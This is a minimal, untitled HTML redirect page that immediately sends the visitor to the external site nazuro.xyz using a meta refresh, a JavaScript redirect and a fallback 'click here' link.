<!DOCTYPE html>
<html>
<head>
    <title></title>
    <meta http-equiv="refresh" content="0; url=https://nazuro.xyz">
    <script>
        window.location.href = "https://nazuro.xyz";
        
        if (document.referrer === "https://nazuro.xyz") {
            window.location.href = window.location.href;
        }
    </script>
</head>
<body>
    <noscript>
        <meta http-equiv="refresh" content="0; url=https://nazuro.xyz">
        <p>If you are not redirected automatically, <a href="https://nazuro.xyz">click here</a>.</p>
    </noscript>
</body>
</html>
